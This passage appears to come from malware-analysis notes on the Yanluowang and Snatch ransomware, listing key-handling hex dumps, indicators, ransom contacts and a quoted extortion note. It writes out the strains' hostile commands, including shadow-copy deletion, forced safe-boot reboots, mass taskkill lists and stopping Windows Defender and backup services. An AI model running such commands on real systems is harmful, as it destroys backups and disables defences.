76 | 00F18318 48 8C A6 50 20 CB F1 0C 17 7A 06 D5 AE EB 2B 5B H.¦P Ëñ..z.Õ®ë+[ 77 | 00F18328 56 D9 06 39 02 2D 42 2B DB 78 A0 38 C8 59 D5 3E VÙ.9.-B+Ûx 8ÈYÕ> 78 | 00F18338 5A 57 ED 7F EF 9B C0 8F 9E CA 5B 9B 3C 44 9A BD ZWí.ï.À..Ê[.Rö³ýÌ:.<À 80 | 00F18358 A9 38 69 8F 65 E5 DC E2 96 D0 F8 77 00 24 88 7B ©8i.eåÜâ.Ðøw.$.{ 81 | 00F18368 38 37 87 5F 3B 21 37 0E 88 EB 8C BB 4C 27 DD 08 87._;!7..ë.»L'Ý. 82 | 00F18378 CD 6A 63 70 5A 14 3B 43 DB 8B 8B 02 E4 D4 73 5B ÍjcpZ.;CÛ...äÔs[ 83 | 00F18388 03 52 C3 F6 1E 1C 0C C7 D0 BF 0A B7 A1 02 03 01 .RÃö...Çп.·¡... 84 | 00F18398 00 01 .. 85 | 86 | CryptDecodeObjectEx and LocalAlloc (05 00 AD BA) 87 | CryptImportPublicKey OID: 1.2.840.113549.1.1.1 88 | 00F19588 A0 95 F1 00 02 00 00 00 B8 95 F1 00 8C 00 00 00  .ñ.....¸.ñ..... 89 | 00F19598 C0 95 F1 00 00 00 00 00 31 2E 32 2E 38 34 30 2E À.ñ.....1.2.840. 90 | 00F195A8 31 31 33 35 34 39 2E 31 2E 31 2E 31 00 F0 AD BA 113549.1.1.1.ð.º 91 | 00F195B8 05 00 AD BA 0D F0 AD BA 30 81 89 02 81 81 00 E0 ...º.ð.º0......à 92 | 00F195C8 85 9D 48 8C A6 50 20 CB F1 0C 17 7A 06 D5 AE EB ..H.¦P Ëñ..z.Õ®ë 93 | 00F195D8 2B 5B 56 D9 06 39 02 2D 42 2B DB 78 A0 38 C8 59 +[VÙ.9.-B+Ûx 8ÈY 94 | 00F195E8 D5 3E 5A 57 ED 7F EF 9B C0 8F 9E CA 5B 9B 3C 44 Õ>ZWí.ï.À..Ê[.Rö³ýÌ:. 96 | 00F19608 3C C0 A9 38 69 8F 65 E5 DC E2 96 D0 F8 77 00 24 <À©8i.eåÜâ.Ðøw.$ 97 | 00F19618 88 7B 38 37 87 5F 3B 21 37 0E 88 EB 8C BB 4C 27 .{87._;!7..ë.»L' 98 | 00F19628 DD 08 CD 6A 63 70 5A 14 3B 43 DB 8B 8B 02 E4 D4 Ý.ÍjcpZ.;CÛ...äÔ 99 | 00F19638 73 5B 03 52 C3 F6 1E 1C 0C C7 D0 BF 0A B7 A1 02 s[.RÃö...Çп.·¡. 100 | 00F19648 03 01 00 01 .... 101 | 102 | 32-byte random key via CryptGenRandom gets copied to the first 32 byte (step #1) 103 | 00F19688 4F 46 95 F1 DC 2C CA 36 F3 C9 57 60 97 B5 6A 05 OF.ñÜ,Ê6óÉW`.µj. 
104 | 00F19698 1C 25 7D CD 7A AE 62 48 03 A1 DE 2E 7C 0C C2 2A .%}Íz®bH.¡Þ.|.Â* 105 | 00F196A8 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA .ð.º.ð.º.ð.º.ð.º 106 | 00F196B8 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA .ð.º.ð.º.ð.º.ð.º 107 | 00F196C8 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA .ð.º.ð.º.ð.º.ð.º 108 | 00F196D8 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA .ð.º.ð.º.ð.º.ð.º 109 | 00F196E8 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA .ð.º.ð.º.ð.º.ð.º 110 | 00F196F8 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA .ð.º.ð.º.ð.º.ð.º 111 | 112 | CryptEncrypt and CryptBinaryToStringA (0x00F19688) (step #2) 113 | Final session key gets appended to the end of all encrypted files 114 | 00F19688 5E C6 31 97 BE 65 F1 86 22 4F 32 0A 18 C9 2C CE ^Æ1.¾eñ."O2..É,Î 115 | 00F19698 A3 D8 50 61 9B 1E E6 5F 9E 3E 38 87 F2 77 8D 4B £ØPa..æ_.>8.òw.K 116 | 00F196A8 41 10 C5 FF AE B6 26 3A F8 2E 64 9B 81 39 37 43 A.Åÿ®¶&:ø.d..97C 117 | 00F196B8 83 AF 1B 6D 3E 24 31 F8 DC 74 2D AA 12 6E 98 03 .¯.m>$1øÜt-ª.n.. 
118 | 00F196C8 60 7B FD 3F 91 BD 1D F4 40 11 3E 65 3F 93 48 C6 `{ý?.½.ô@.>e?.HÆ 119 | 00F196D8 3C F7 49 13 35 0B 7F 14 2F 8B 21 BA 23 E0 21 D7 <÷I.5.../.!º#à!× 120 | 00F196E8 D0 18 3F CA 8E C9 2A E4 E1 4B DA BB 67 E0 50 74 Ð.?Ê.É*äáKÚ»gàPt 121 | 00F196F8 B1 47 65 2A 9C C5 9A 29 0E 4E 98 52 BD 07 DA 6F ±Ge*.Å.).N.R½.Úo 122 | 123 | Final session key gets converted to Base64 124 | 00F1A920 58 73 59 78 6C 37 35 6C 38 59 59 69 54 7A 49 4B XsYxl75l8YYiTzIK 125 | 00F1A930 47 4D 6B 73 7A 71 50 59 55 47 47 62 48 75 5A 66 GMkszqPYUGGbHuZf 126 | 00F1A940 6E 6A 34 34 68 2F 4A 33 6A 55 74 42 45 4D 58 2F nj44h/J3jUtBEMX/ 127 | 00F1A950 72 72 59 6D 4F 76 67 75 5A 4A 75 42 4F 54 64 44 rrYmOvguZJuBOTdD 128 | 00F1A960 0D 0A 67 36 38 62 62 54 34 6B 4D 66 6A 63 64 43 ..g68bbT4kMfjcdC 129 | 00F1A970 32 71 45 6D 36 59 41 32 42 37 2F 54 2B 52 76 52 2qEm6YA2B7/T+RvR 130 | 00F1A980 33 30 51 42 45 2B 5A 54 2B 54 53 4D 59 38 39 30 30QBE+ZT+TSMY890 131 | 00F1A990 6B 54 4E 51 74 2F 46 43 2B 4C 49 62 6F 6A 34 43 kTNQt/FC+LIboj4C 132 | 00F1A9A0 48 58 0D 0A 30 42 67 2F 79 6F 37 4A 4B 75 54 68 HX..0Bg/yo7JKuTh 133 | 00F1A9B0 53 39 71 37 5A 2B 42 51 64 4C 46 48 5A 53 71 63 S9q7Z+BQdLFHZSqc 134 | 00F1A9C0 78 5A 6F 70 44 6B 36 59 55 72 30 48 32 6D 38 3D xZopDk6YUr0H2m8= 135 | 136 | Base64 gets added to the end of the ransom note 137 | 00F1B570 63 61 6E 67 2E 6C 65 65 6E 40 6D 61 69 6C 66 65 cang.leen@mailfe 138 | 00F1B580 6E 63 65 2E 63 6F 6D 0A 32 29 79 61 6E 2E 6C 61 nce.com.2)yan.la 139 | 00F1B590 6F 77 61 6E 67 40 6D 61 69 6C 66 65 6E 63 65 2E owang@mailfence. 
140 | 00F1B5A0 63 6F 6D 4A 58 73 59 78 6C 37 35 6C 38 59 59 69 comJXsYxl75l8YYi 141 | 00F1B5B0 54 7A 49 4B 47 4D 6B 73 7A 71 50 59 55 47 47 62 TzIKGMkszqPYUGGb 142 | 00F1B5C0 48 75 5A 66 6E 6A 34 34 68 2F 4A 33 6A 55 74 42 HuZfnj44h/J3jUtB 143 | 00F1B5D0 45 4D 58 2F 72 72 59 6D 4F 76 67 75 5A 4A 75 42 EMX/rrYmOvguZJuB 144 | 00F1B5E0 4F 54 64 44 0D 0A 67 36 38 62 62 54 34 6B 4D 66 OTdD..g68bbT4kMf 145 | 00F1B5F0 6A 63 64 43 32 71 45 6D 36 59 41 32 42 37 2F 54 jcdC2qEm6YA2B7/T 146 | 00F1B600 2B 52 76 52 33 30 51 42 45 2B 5A 54 2B 54 53 4D +RvR30QBE+ZT+TSM 147 | 00F1B610 59 38 39 30 6B 54 4E 51 74 2F 46 43 2B 4C 49 62 Y890kTNQt/FC+LIb 148 | 00F1B620 6F 6A 34 43 48 58 0D 0A 30 42 67 2F 79 6F 37 4A oj4CHX..0Bg/yo7J 149 | 00F1B630 4B 75 54 68 53 39 71 37 5A 2B 42 51 64 4C 46 48 KuThS9q7Z+BQdLFH 150 | 00F1B640 5A 53 71 63 78 5A 6F 70 44 6B 36 59 55 72 30 48 ZSqcxZopDk6YUr0H 151 | 00F1B650 32 6D 38 3D 2m8=. 152 | ``` 153 | 154 | ### Ransomware executable digital signature: 155 | ``` 156 | Name: AdClearance Limited 157 | Thumbprint: 614A13CA73AE2F01D860B5F87B71CA38F5307DBD 158 | SN: 0D 0D A8 84 0C 1A 95 9D 09 32 47 FA 33 6E 5A 2D 159 | ``` 160 | 161 | ### Mutex: 162 | ``` 163 | Type=Mutant 164 | Name=\Sessions\1\BaseNamedObjects\SM0:pid:handle:WilStaging_02 165 | ``` 166 | 167 | ### E-mails from the ransom note: 168 | ``` 169 | cang.leen@mailfence.com 170 | yan.laowang@mailfence.com 171 | ``` 172 | 173 | ### Ransomware execution arguments: 174 | ``` 175 | -h 176 | -p 177 | -pass 178 | -path 179 | --help 180 | --pass 181 | --path 182 | ``` 183 | 184 | ### Ransomware extension: 185 | ``` 186 | .yanluowang 187 | ``` 188 | 189 | ### Ransomware note: 190 | ``` 191 | README.txt 192 | ``` 193 | 194 | ### Ransomware (-h) execution helper: 195 | ``` 196 | Syntax: encrypt.exe [(-p,-path,--path)] 197 | ``` 198 | 199 | ### Interesting commands executed: 200 | ``` 201 | cmd.exe /c powershell -command "Get-VM | Stop-VM -Force" 202 | cmd.exe /c for /l %x in (1,1,3) do start wordpad.exe /p 
203 | ``` 204 | 205 | ### Terminated processes (matched via CreateToolhelp32Snapshot enumeration): 206 | ``` 207 | veeam 208 | sql 209 | ``` 210 | 211 | ### Skipped folders: 212 | ``` 213 | PROGRA~1 214 | PROGRA~2 215 | PROGRA~3 216 | SYSTEM~1 217 | Windows 218 | WINDOWS 219 | ``` 220 | 221 | ### Skip-list for extensions: 222 | ``` 223 | exe 224 | dll 225 | conf 226 | a 227 | lib 228 | bat 229 | ps 230 | msi 231 | cfg 232 | reg 233 | sys 234 | lnk 235 | obj 236 | ini 237 | yanluowang 238 | ``` 239 | 240 | ### Killed processes (taskkill launched via ShellExecute): 241 | ``` 242 | taskkill /f /im CNTAoSMgr* 243 | taskkill /f /im IBM* 244 | taskkill /f /im Notifier* 245 | taskkill /f /im Ntrtscan* 246 | taskkill /f /im TmListen* 247 | taskkill /f /im bes10* 248 | taskkill /f /im black* 249 | taskkill /f /im chrome* 250 | taskkill /f /im copy* 251 | taskkill /f /im ds_monitor* 252 | taskkill /f /im dsa* 253 | taskkill /f /im excel* 254 | taskkill /f /im firefox* 255 | taskkill /f /im iVPAgent* 256 | taskkill /f /im iexplore* 257 | taskkill /f /im mysql* 258 | taskkill /f /im outlook* 259 | taskkill /f /im postg* 260 | taskkill /f /im putty* 261 | taskkill /f /im robo* 262 | taskkill /f /im sage* 263 | taskkill /f /im sql 264 | taskkill /f /im sql* 265 | taskkill /f /im ssh* 266 | taskkill /f /im store.exe 267 | taskkill /f /im tasklist* 268 | taskkill /f /im taskmgr* 269 | taskkill /f /im vee* 270 | taskkill /f /im veeam* 271 | taskkill /f /im wrsa* 272 | taskkill /f /im wrsa.exe 273 | ``` 274 | 275 | ### Stopped services: 276 | ``` 277 | net stop IISADMIN 278 | net stop MSExchangeADTopology 279 | net stop MSExchangeFBA 280 | net stop MSExchangeIS 281 | net stop MSExchangeSA 282 | net stop MSSQL$ISARS 283 | net stop MSSQL$MSFW 284 | net stop MSSQLServerADHelper100 285 | net stop QBCFMonitorService 286 | net stop QBPOSDBServiceV12 287 | net stop QBVSS 288 | net stop QuickBooksDB1 289 | net stop QuickBooksDB10 290 | net stop QuickBooksDB11 291 | net stop QuickBooksDB12 292 | net stop QuickBooksDB13 293 | net 
stop QuickBooksDB14 294 | net stop QuickBooksDB15 295 | net stop QuickBooksDB16 296 | net stop QuickBooksDB17 297 | net stop QuickBooksDB18 298 | net stop QuickBooksDB19 299 | net stop QuickBooksDB2 300 | net stop QuickBooksDB20 301 | net stop QuickBooksDB21 302 | net stop QuickBooksDB22 303 | net stop QuickBooksDB23 304 | net stop QuickBooksDB24 305 | net stop QuickBooksDB25 306 | net stop QuickBooksDB3 307 | net stop QuickBooksDB4 308 | net stop QuickBooksDB5 309 | net stop QuickBooksDB6 310 | net stop QuickBooksDB7 311 | net stop QuickBooksDB8 312 | net stop QuickBooksDB9 313 | net stop ReportServer$ISARS 314 | net stop SPAdminV4 315 | net stop SPSearch4 316 | net stop SPTimerV4 317 | net stop SPTraceV4 318 | net stop SPUserCodeV4 319 | net stop SPWriterV4 320 | net stop SQLAgent$ISARS 321 | net stop SQLAgent$MSFW 322 | net stop SQLBrowser 323 | net stop SQLWriter 324 | net stop ShadowProtectSvc 325 | net stop WinDefend 326 | net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)" 327 | net stop "IBM Domino Server (CProgramFilesIBMDominodata)" 328 | net stop "Simply Accounting Database Connection Manager" 329 | net stop firebirdguardiandefaultinstance 330 | net stop ibmiasrw 331 | net stop mr2kserv 332 | ``` 333 | 334 | ### Ransom note: 335 | ``` 336 | Hi, since you are reading this it means you have been hacked. 337 | In addition to encrypting all your systems, deleting backups, we also downloaded 2 terabytes of confidential information. 338 | Here's what you shouldn't do: 339 | 1) Contact the police, fbi or other authorities before the end of our deal 340 | 2) Contact the recovery company so that they would conduct dialogues with us. (This can slow down the recovery, and generally put our communication to naught) 341 | 3) Do not try to decrypt the files yourself, as well as do not change the file extension yourself !!! This can lead to the impossibility of their decryption. 
342 | 4) Keep us for fools) 343 | We will also stop any communication with you, and continue DDoS, calls to employees and business partners. 344 | In a few weeks, we will simply repeat our attack and delete all your data from your networks, WHICH WILL LEAD TO THEIR UNAVAILABILITY! 345 | Here's what you should do right after reading it: 346 | 1) If you are an ordinary employee, send our message to the CEO of the company, as well as to the IT department 347 | 2) If you are a CEO, or a specialist in the IT department, or another person who has weight in the company, you should contact us within 24 hours by email. 348 | We are ready to confirm all our intentions regarding DDOS, calls, and deletion of the date at your first request. 349 | As a guarantee that we can decrypt the files, we suggest that you send several files for free decryption. 350 | Mails to contact us: 351 | 1)cang.leen@mailfence.com 352 | 2)yan.laowang@mailfence.comJ0mAm8SN6C0BPAImmRDBChtERC7nTlQ49bsh2xDb4IrtDvr17bCwy+GSiq+IFUT4H 353 | irx+WpNuWBzpS2CUO6pR+FkYoaltOtN+fMpogxD3jzCC29ksq2BfcXqLSIr/zJuz 354 | HJ3saoWSBxf0XTA5SMU1xJ0d/Nx/wu2t7Vb4sethsj4= 355 | ``` 356 | 357 | The `J` immediately after the e-mail address is hardcoded and is not part of the Base64-encoded key; when extracting the key from a note, start at the character that follows the `J`. 
358 | `2)yan.laowang@mailfence.comJ0mAm8SN6C0BPAImmRDBChtERC7nTlQ49bsh2xDb4IrtDvr17bCwy+GSiq+IFUT4H` 359 | -------------------------------------------------------------------------------- /Ransomware/Snatch.md: -------------------------------------------------------------------------------- 1 | # Snatch ransomware 2 | 3 | ## SHA256s: 4 | - eebc57e9e683a3c5391692c1c3afb37f3cb539647f02ddd09720979426790f56 5 | - 78816ea825209162f0e8a1aae007691f9ce39f1f2c37d930afaf5ac3af78e852 6 | - 80cc8e51b3b357cfc7115e114cecabc5442c12c143a7a18ab464814de7a66ab4 7 | - ebcded04429c4178d450a28e5e190d6d5e1035abcd0b2305eab9d29ba9c0915a 8 | - fe8ba1eaf69b1eba578784d5ab77e54caae9d90c2fb95ad2baaaef6b69a2d6cb 9 | - 28125dae3ab7b11bd6b0cbf318fd85ec51e75bca5be7efb997d5b950094cd184 10 | - 0ce4c4af321ff02928aacf105f03dead87e85003080586615755f278770f5adb 11 | - 36a4311ef332b0b5db62f8fcabf004fdcfbbde62f791839a8be0314604d814c4 12 | - d0ddc221b958d9b4c7d9612dd2577bec35d157b41aa50210c2ae5052d054ff33 13 | - e8931967ed5a4d4e0d7787054cddee8911a7740b80373840b276f14e36bda57d 14 | - ae9cdbb717625506ed0df7af153dc2741395655aeb1da2f91079e3ea616af6a1 15 | - 5f24536e48f406177a9a630b0140baadff1e29f36b02095b25e7e21c146098bb 16 | - c0f506e98f416412b3a9dcd018341afab15e36b15bac89d3b02ff773b6cc85a6 17 | - 36a4311ef332b0b5db62f8fcabf004fdcfbbde62f791839a8be0314604d814c4 18 | - 8c9fab558b3e9e21936a91422d9e2666f210c5fd7d9b0fd08d2353adb64a4c00 19 | - 329f295b8aa879bedd68cf700cecc51f67feee8fd526e2a7eab27e216aa8fcaa 20 | - ab6b0d00ba8f8553c015743b9da8761a9b1fca750d3f73bda573a8fbc47dafa1 21 | - 63c2c1ad4286dbad927358f62a449d6e1f9b1aa6436c92a2f6031e9554bed940 22 | - d22b46ea682838e0b98bc6a1e36fd04f0672fe889c03d227cdeb5dcc5d76ae7c 23 | 24 | ## Seen commands: 25 | - vssadmin delete shadows /all /quiet 26 | - bcdedit.exe /set {current} safeboot minimal 27 | - shutdown.exe /r /f /t 00 28 | - net stop SuperBackupMan 29 | 30 | ## Touched registry keys: 31 | - 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SuperBackupMan 32 | 33 | ## Build IDs: 34 | - Go Build ID: `9sbGxHyc5vSAXzwvg6iZ/c_gG_xy9d6xmNt9nMlii/HdKHUjGFLxliYJycPc5E/yTT_FNpw78SfII62lGUn` 35 | - Go build ID: `2KZVw_piBNB6c74hlRt4/ueMyrcUcK4ismcjykWop/ZQYGFEYcaBSofxZbcs4g/GK-7e3PY8vHyy_lSkbVi` 36 | - Go build ID: `jPF3Jrx2uZ7VjN0GyDBL/x3B31XZylJgOhAVFZiym/o_aCHMB9kgaxIibXVOox/VQQhgCuLOuABGRrXzFdl` 37 | - Go build ID: `ULgusZVAlPcWOJcj9LKW/fOp_xyXqQQO5nzk3CZIW/LV-l8Ye8SLuN39dCmiDH/_34hEcu3a_yVC0sdeBdP` 38 | - Go build ID: `BIFnB6MdgF4djhq39TIM/0F-O_BMJNaIkMOFRC1kQ/j2Fm9d-Ilq-6KP4f1cuF/I07Xn6PJTdAcrP3IsVX4` 39 | - Go build ID: `cN2S005MM6pjpFXzNYd7/Lu1OzfnOLXKCy8mQdge9/GnIsH3q8hyF-pEAWP4K0/ISXM5yfoGT6hDQpcP08E` 40 | - Go build ID: `jPF3Jrx2uZ7VjN0GyDBL/x3B31XZylJgOhAVFZiym/o_aCHMB9kgaxIibXVOox/VQQhgCuLOuABGRrXzFdl` 41 | - Go build ID: `D4uZyyRaOm8WP2m599HU/gZkWHWmCm-S2lk0u6tJQ/F9Wz3xBbUlF3TISfF8Gu/uPBkEF2KfTla4ver6O79` 42 | - Go build ID: `nz4NhyAgWYITxG9Gw5rT/an0sbWQDT73tZEat72I5/KKmIcIIeFCNSYj4p5koW/BHky2GAanYgZQqXGSyei` 43 | - Go build ID: `5-A2FKXbqQxWZGpMv5bi/ysyqhwQZ0g_FlybbfpOj/gPShdrjwHV2q1IVo0Bfv/VrGig2m_K67aAwzTrv-d` 44 | - Go build ID: `7fR8nrem5X2guhWKTPqX/q9bOGJlbcqSoZeCNpJdo/mOeL2egnn8VuZltxekp2/kA3DJl8bjxG0VOFnIT50` 45 | - Go build ID: `fAuIatqF3y2yPFaOAmMh/Et041_4MdPXnmmKEPTI8/bLick1lrFdeTrGIZYxo0/BvSPmptslW8GXm3csJBq` 46 | - Go build ID: `PMCyRyS181ZPRw9CPWkE/BJ5j2V8jsBgo1aLecx02/-mWXZMHLo88PEQt8rTZh/6GyAnytdqm84O_xZwCVm` 47 | - Go build ID: `nB7zOcAzQudulTvhaVuz/uWzvsXECCzDi31bEsmeR/mdhphV43beOO8Hzgn3aY/1oICpWzuVziHGBPyIaWN` 48 | - Go build ID: `TaXB1rNPyYrygpK-oZNY/O0ppKu626ti9yZPiCuBy/HNBUBG6libSaTytSLJmj/ePd3gggAZvpTekDGyMGd` 49 | - Go build ID: `TXyoACiHB6yxvG0Yd6kP/hzi7-6t6mqUmTJ9J66t_/ZKtxycPXIUbozCq82XXw/eaQW7T0yucgUkYHrfeB6` 50 | - Go build ID: `xj_rOMfBvvcseIbyjASX/hE4P0VpinFe8VwzMdQb8/WM7Lm2U1MfJFgmiWnFRV/exQGRNv1v9l--efSLCbV` 51 | - Go build ID: 
`zxnj4797V-v_vkqaAHGu/BSTalyYehfQcP1Dv83BC/hn0rES9XcX2jjV8Ef_rk/1HCK9U9y8XUVnZ8kpISL` 52 | 53 | ## Ransom sites: 54 | - mydatasuperhero[.]com 55 | - mydatassuperhero[.]com 56 | - storedataresback[.]com 57 | - snatch24uldhpwrm[.]onion 58 | - snatchh5ssxiorrn[.]onion 59 | - snatch6brk4nfczg[.]onion 60 | 61 | ## Ransom e-mails: 62 | - imBoristheBlade@protonmail.com 63 | - jimmtheworm@dicksinmyan.us 64 | - doctor666@mail.fr 65 | - doctor666@cock.li 66 | - newrecoveryrobot@pm.me 67 | 68 | ## Ransom extensions: 69 | - .snatch 70 | - .jimm 71 | - .googl 72 | - .dglnl 73 | - .ohwqg 74 | - .wvtr0 75 | - .hceem 76 | - .v9zfe 77 | - .dadzj 78 | - .jhxgu 79 | - .tnvcf 80 | - .pywdu 81 | - .r0nph 82 | - .peb4w 83 | - .fanot 84 | - .hwie5 85 | - .pywdu 86 | - .lyptm 87 | - .v6cye 88 | - .a9xtk 89 | - .z5kt6 90 | - .pino5 91 | - .cbs0z 92 | 93 | ## Ransom notes: 94 | - Readme_Restore_Files.txt 95 | - README_A9XTK_FILES.txt 96 | - README_HWIE5_DATA.txt 97 | - Restore_JIMM_Files.txt 98 | - RESTORE_DGLNL_FILES.txt 99 | - RESTORE_V6CYE_FILES.txt 100 | - RESTORE_LYPTM_FILES.txt 101 | - RESTORE_WVTR0_FILES.txt 102 | - RESTORE_PEB4W_DATA.txt 103 | - RESTORE_PYWDU_DATA.txt 104 | - RESTORE_HCEEM_DATA.txt 105 | - RESTORE_CBS0Z_DATA.txt 106 | - DECRYPT_GOOGL_FILES.txt 107 | - DECRYPT_OHWQG_FILES.txt 108 | - DECRYPT_JHXGU_FILES.txt 109 | - DECRYPT_TNVCF_FILES.txt 110 | - DECRYPT_R0NPH_FILES.txt 111 | 112 | ## PGP keys: 113 | ```pgp 114 | -----BEGIN PGP PUBLIC KEY BLOCK----- 115 | mQENBFweVqABCAC3PXE/MxccyzOYJfdHzoPsYDbL5SrdKP3ILKf4h6t02zgEfWrF 116 | 0ttz4dSa+91Tyc3QAGFtk/2etVgPI0/gGr0KowSZmORpT/Iwd0GupgkkOgrB74k9 117 | 0C1KRycFqJZ8MBLwhlIXvH7VimH5CKEC/LpmvhAl1xXtPm1j/uNpFXsrJR8ylOLL 118 | PlZGq0wsNwJOJPEjNyG0bjJbAT5yTTCDNdff7n0kHZuGjLFAB1m+BTG8qfkty9up 119 | 0dAIm0Qrw2dMBy7qXB+XFZXBWWMIl+fw09E1PuhL4D2srNRlooJ60uuFVTVbHUgs 120 | iQfyKgxHhrg4JuhKqQCWk5ott8xRR+IN5y+dABEBAAG0CEJNS2dyb3VwiQFUBBMB 121 | CAA+FiEE+s9TvJ78zuMzMyWzKmTlL/HLOL4FAlweVqACGwMFCQPCZwAFCwkIBwIG 122 | 
FQoJCAsCBBYCAwECHgECF4AACgkQKmTlL/HLOL65Uwf+Os21LjmJmwFIGy/vKyfq 123 | 8p9wMvQMtTrbb7ANFTs6vm3WQmzsYfM8P/X6lu3bfYLVf/oyEfYhbSFmXZjprUV+ 124 | TGdmVu8slQKLDdMEqSmQLefSUpG8ymrkpOtGFh0INll7cybGPF5waq03gNKGj7nR 125 | FoRzpNJPmVbtzcBWtRb8l8c7xV0eOILZkPi/JIfE5dJ53yZv0VrhB0YjI7OE2PCd 126 | UnftPW9Kz6VfH17+umCBx4/bouIszcY72SeJfZgigRTV1OFQ6tNGcYjNQvAi48MT 127 | ncY6YvVb43RGC03RZVaDbqkXVnqX7k6YqRapd+mGg651MgaLy42lmuuCJPMX0VAP 128 | h7kBDQRcHlagAQgA04wYhhHLC4vB+pAM0xk8WS+lTbBp3hwWIU6vBAdnAH15KgIh 129 | ElNnD62te6k9xxg6hEY7k8bl1jog80ub8HG+DNBi4LV+BAD/5yETQuxaVD//kmvo 130 | eULmb+Pjl6eorvf6YnpQqN9WCXUMTwHJOwT37wx3KI6B/tPuGelMTCkU6tdhHOmD 131 | AnpY6kNEaPC9UoGLMMuxIZGqHJviNtFIpzbFQe5yZJoN4wc1yHMw0EZ/lmdsA6mU 132 | iSCWFl22hlmqP1j2XNW81v2B8YQpJn4F9jheeBxxqQ102RwGgz6yPIJwKBoDs4YC 133 | ATSbEJdUz5QbNZTKl5vB2/jlwNHmMTXY2Gc/pQARAQABiQE8BBgBCAAmFiEE+s9T 134 | vJ78zuMzMyWzKmTlL/HLOL4FAlweVqACGwwFCQPCZwAACgkQKmTlL/HLOL5FLAgA 135 | nU888FA/rudDf2oKlYJx1qkPG8kSwTIAqv+K13rR5+B7t3kaW0rhlYpHM9Jyy65L 136 | UPV1gzrwPJdOOuY6bKyFI8I0mok74Nxlzd/SVBbUZDqWzgn1mZJeO8hVrrF2VBN5 137 | b8PCi+FxJU6f9/yMWsgrM5E6QfyC+HOfWfVGisyPyUo+f18ouqOC+zNHSP5rQhVY 138 | oWmFLy1/jOzjFVs9nmuT5A1h84PAElR2QyDDWraGffWiqanx4klZpheL35hj4O60 139 | gTDlSWWQhrTAXRDQlp8KMzFjKsXE/GBJPcBMKhEh0Qyjaf6dEdDFjZeKQB6ibAuv 140 | kCdVOtU2uOwFY5k4VsGkjA== 141 | =R6+l 142 | -----END PGP PUBLIC KEY BLOCK----- 143 | ``` 144 | 145 | ```pgp 146 | -----BEGIN PGP PUBLIC KEY BLOCK----- 147 | mQENBF2aIIIBCADBn685GzDuQ15fin4zpnpCzNhbDjVQ74Rq7irrPEQyL1SowxXj 148 | n40SVd/xnwCNeoMiA2feLPN+fs9cPAsSgXQd6fRDGCanfEe5JBlrSniOB4iU+MFe 149 | /RRHO8VEe63MWTuoA3k5qwbvpajPesX0tIQf+4F2YhkhRyNGUUoj1ePc1F2Knhcg 150 | 4JwsRwWgV/yOy3HsfWRb7BLLGDy0CaRmKvXa7Doo3mHD9FsvITN/MbFLA2v27ab5 151 | mNY/Ehg5JAbF3Wm7jSFcRcBvEwv457lPOT4HuyZaCpn3L/SA/BfUGtoVZeapxmcy 152 | Em9S4S09pyvGJyJc6XMbYH+7FHwH1KxysVzXABEBAAG0FHl1YnBzbGpmeHJldmdu 153 | d2F0ZGl6iQFUBBMBCAA+FiEEAaFwnu8Dq/zRU0diEqGvgbEO/y0FAl2aIIICGwMF 154 | CQPCZwAFCwkIBwIGFQoJCAsCBBYCAwECHgECF4AACgkQEqGvgbEO/y3f8gf/ayin 155 
| A31IlxasEmsqVyV+qTN5i9yi3sGQ6ItdrQOEOqnxBcx70cmXllA+MJO3UjRlVX6B 156 | h7rCwMfbxH5r8j9Ga/Uuci5doTQ9hSaBCcodloWxuKy6nYtfiHhNUhNRZ31WASek 157 | y5aw9aZkmgwA05n8bO04jd2y3nlSKpN8S0gwbdW8MBH4mftqpyM7VnZTxCkYh4T+ 158 | wGd5NxZtzU0+awx6nZjqrQeVlaKu7hLK5WHPqOkYPjVm0+3YVAOSDo718pZz9L5X 159 | zyVkaXWXC3qwOxVOzR2KZkEx/VJvl99zgvpdd3V7nZeFC6W32v2aAjvO15yCaooa 160 | dnKGwp9Y3X+18DXPtbkBDQRdmiCCAQgAt3ATiseIov9Ze75CHHO0/mX80dkAjqhC 161 | 4bK5WM2YCfifzZm9SANs/zxzUc5AeTfxyU5LXfhF5USJHZBaZ76G6jUD8u46Vwpi 162 | OQUJ/VDkjggAm4rEGwEsGj0x5bx366mrGiPydTU4e8g544v/o+V7ByxhiPnEoEp2 163 | citAMpI8ZL/qMTJ/P7EZ5UEpL/meBfuZlfl1Z2NBlNgsTuPn/9ZSuK0Wyv0wCOyE 164 | 1dp8KPGAvN0oMOoymgXTEN2aaViR932r5p4T54OpE2wkLHnFGBLTkmvOrDAWDzY8 165 | oAxLYGWME/fpVoC9aFQmhsfjcyeMK9DuRAI/0tdvHLwEr3uN5ksF2QARAQABiQE2 166 | BBgBCAAgFiEEAaFwnu8Dq/zRU0diEqGvgbEO/y0FAl2aIIICGwwACgkQEqGvgbEO 167 | /y3O9Af/exVH5VBL4j9d17NStn0mUsAs6YSMOAZV743SIJOPib9r+VkBeTVr4oEe 168 | 2TOcXZd5BwMdXc27eZlOVUYudGgZ8uZQ/AaujXZVN/6zEqzIXQV0lMMdFKJf/dVz 169 | 0bSSzIa96amJSL43P7pEL4WiW2RoPQbLF9oMmq1MaaPjyGHf29G7FhHE1e3UkzXM 170 | ewIur86aYyF7fJq0mOWmvqp2BFULx8ilAz7a1Gx8wMTLtNma4rEQCojLv4sUQb+x 171 | GXLTkTJxiSvSuX87SBPB3si6OXVzkyteyNQcghsa3GW7EVUa4RjypaTCVNy89YSf 172 | OqAL/ehJMc820ZnYc/acROujBW253A== 173 | =gCZP 174 | -----END PGP PUBLIC KEY BLOCK----- 175 | ``` 176 | 177 | ```pgp 178 | -----BEGIN PGP PUBLIC KEY BLOCK----- 179 | mQENBFzOpcIBCAC0dyP274m5SfR8MQi13d8HJR3yY/NBBDUEuKIXbn1Y1ZhB9t+l 180 | wqxxC8NdHVHi10WTecngJf6jgofUgQVeZvMFVKM2XEb89nM1nCnvLq0x6dJGq0jj 181 | hC68G0gmZ5LpfpVVsvZF3dJT1Et8Qwqy1W9fG59QoU52H7ItnZMWpqrqhDIFyB9s 182 | 